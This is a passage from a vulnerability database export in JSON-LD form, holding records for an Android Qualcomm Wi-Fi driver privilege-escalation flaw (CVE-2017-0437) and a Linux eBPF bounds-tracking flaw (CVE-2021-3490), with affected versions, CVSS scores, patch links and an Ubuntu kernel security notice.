      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NVIDIA Information disclosure vulnerability in video drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ],
    "trust": 0.6
  }
}

var-201702-0752
Vulnerability from variot

An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32402310. References: QC-CR#1092497. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0752",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 1.4,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0437"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0437"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd",
    "sources": [
      {
        "db": "BID",
        "id": "96047"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0437",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0437",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-01585",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0437",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0437",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01585",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-297",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0437",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0437"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0437"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32402310. References: QC-CR#1092497. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0437"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0437"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0437",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96047",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-297",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0437",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0437"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0437"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ]
  },
  "id": "VAR-201702-0752",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      }
    ]
  },
  "last_update_date": "2023-12-18T10:56:53.131000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for QualcommWi-FiDriver Privilege Escalation Vulnerability for GoogleNexus/Pixel Products",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89417"
      },
      {
        "title": "Android Qualcomm Wi-Fi Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67581"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0437"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0437"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/96047"
      },
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0437"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0437"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/120.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0437"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0437"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0437"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0437"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0437"
      },
      {
        "date": "2017-02-07T00:00:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "date": "2017-02-08T15:59:01.583000",
        "db": "NVD",
        "id": "CVE-2017-0437"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01585"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0437"
      },
      {
        "date": "2017-03-07T00:02:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0437"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Wi-Fi Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001486"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-297"
      }
    ],
    "trust": 0.6
  }
}

var-202106-1232
Vulnerability from variot

The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e ("bpf: Fix alu32 const subreg bound tracking on bitwise operations") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 ("bpf: Verifier, do explicit ALU32 bounds tracking") (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 ("bpf:Fix a verifier failure with xor") ( 5.10-rc1). Linux Kernel contains an out-of-bounds read vulnerability and an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows local attackers to escalate privileges on affected installations of Canonical Ubuntu. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the handling of eBPF programs. The issue results from the lack of proper validation of user-supplied eBPF programs prior to executing them. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the kernel. Linux kernel is the kernel used by Linux, the open source operating system of the Linux Foundation of the United States.

There are security vulnerabilities in the Linux kernel. The vulnerability stems from the discovery that eBPF ALU32 boundary tracking for bitwise operations (AND, OR, and XOR) does not update 32-bit boundaries. No detailed vulnerability details are currently provided. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Please note that to address this issue, SF_BROADCAST support was removed temporarily from the CAN ISOTP implementation in Ubuntu 21.04 kernels.

Software Description: - linux-oem-5.10: Linux kernel for OEM systems

Details:

Ryota Shiga discovered that the eBPF implementation in the Linux kernel did not properly verify that a BPF program only reserved as much memory for a ring buffer as was allocated. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3490)

Billy Jheng Bing-Jhong discovered that the io_uring implementation of the Linux kernel did not properly enforce the MAX_RW_COUNT limit in some situations. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3491)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel contained a reference counting error. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-25670)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly deallocate memory in certain error situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2020-25671, CVE-2020-25672)

It was discovered that the Xen paravirtualization backend in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-28688)

It was discovered that the io_uring subsystem in the Linux kernel contained a race condition leading to a deadlock condition. A local attacker could use this to cause a denial of service. (CVE-2021-28951)

John Stultz discovered that the audio driver for Qualcomm SDM845 systems in the Linux kernel did not properly validate port ID numbers. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28952)

Zygo Blaxell discovered that the btrfs file system implementation in the Linux kernel contained a race condition during certain cloning operations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2021-28964)

Vince Weaver discovered that the perf subsystem in the Linux kernel did not properly handle certain PEBS records properly for some Intel Haswell processors. A local attacker could use this cause a denial of service (system crash). (CVE-2021-28971)

It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28972)

It was discovered that the Freescale Gianfar Ethernet driver for the Linux kernel did not properly handle receive queue overrun when jumbo frames were enabled in some situations. An attacker could use this to cause a denial of service (system crash). An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-29266)

It was discovered that the TIPC protocol implementation in the Linux kernel did not properly validate passed encryption key sizes. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29646)

It was discovered that the Qualcomm IPC router implementation in the Linux kernel did not properly initialize memory passed to user space. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-29647)

It was discovered that the BPF user mode driver implementation in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-29649)

It was discovered that a race condition existed in the netfilter subsystem of the Linux kernel when replacing tables. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29650)

Felix Wilhelm discovered that the KVM implementation in the Linux kernel for AMD processors contained race conditions on nested VMCB controls. A local attacker in a guest vm could possibly use this to gain elevated privileges. (CVE-2021-29657)

Dan Carpenter discovered that the block device manager (dm) implementation in the Linux kernel contained a buffer overflow in the ioctl for listing devices. A privileged local attacker could use this to cause a denial of service (system crash). (CVE-2021-31916)

马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3483)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.04 LTS: linux-image-5.10.0-1026-oem 5.10.0-1026.27 linux-image-oem-20.04b 5.10.0.1026.27

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4948-1 CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2021-28688, CVE-2021-28951, CVE-2021-28952, CVE-2021-28964, CVE-2021-28971, CVE-2021-28972, CVE-2021-29264, CVE-2021-29266, CVE-2021-29646, CVE-2021-29647, CVE-2021-29649, CVE-2021-29650, CVE-2021-29657, CVE-2021-31916, CVE-2021-3483, CVE-2021-3489, CVE-2021-3490, CVE-2021-3491

Package Information: https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27 . (CVE-2020-25639)

Olivier Benjamin, Norbert Manthey, Martin Mazein, and Jan H

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202106-1232",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ubuntu",
        "scope": null,
        "trust": 1.5,
        "vendor": "canonical",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 1.4,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "20.10"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.21"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.37"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "20.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13"
      },
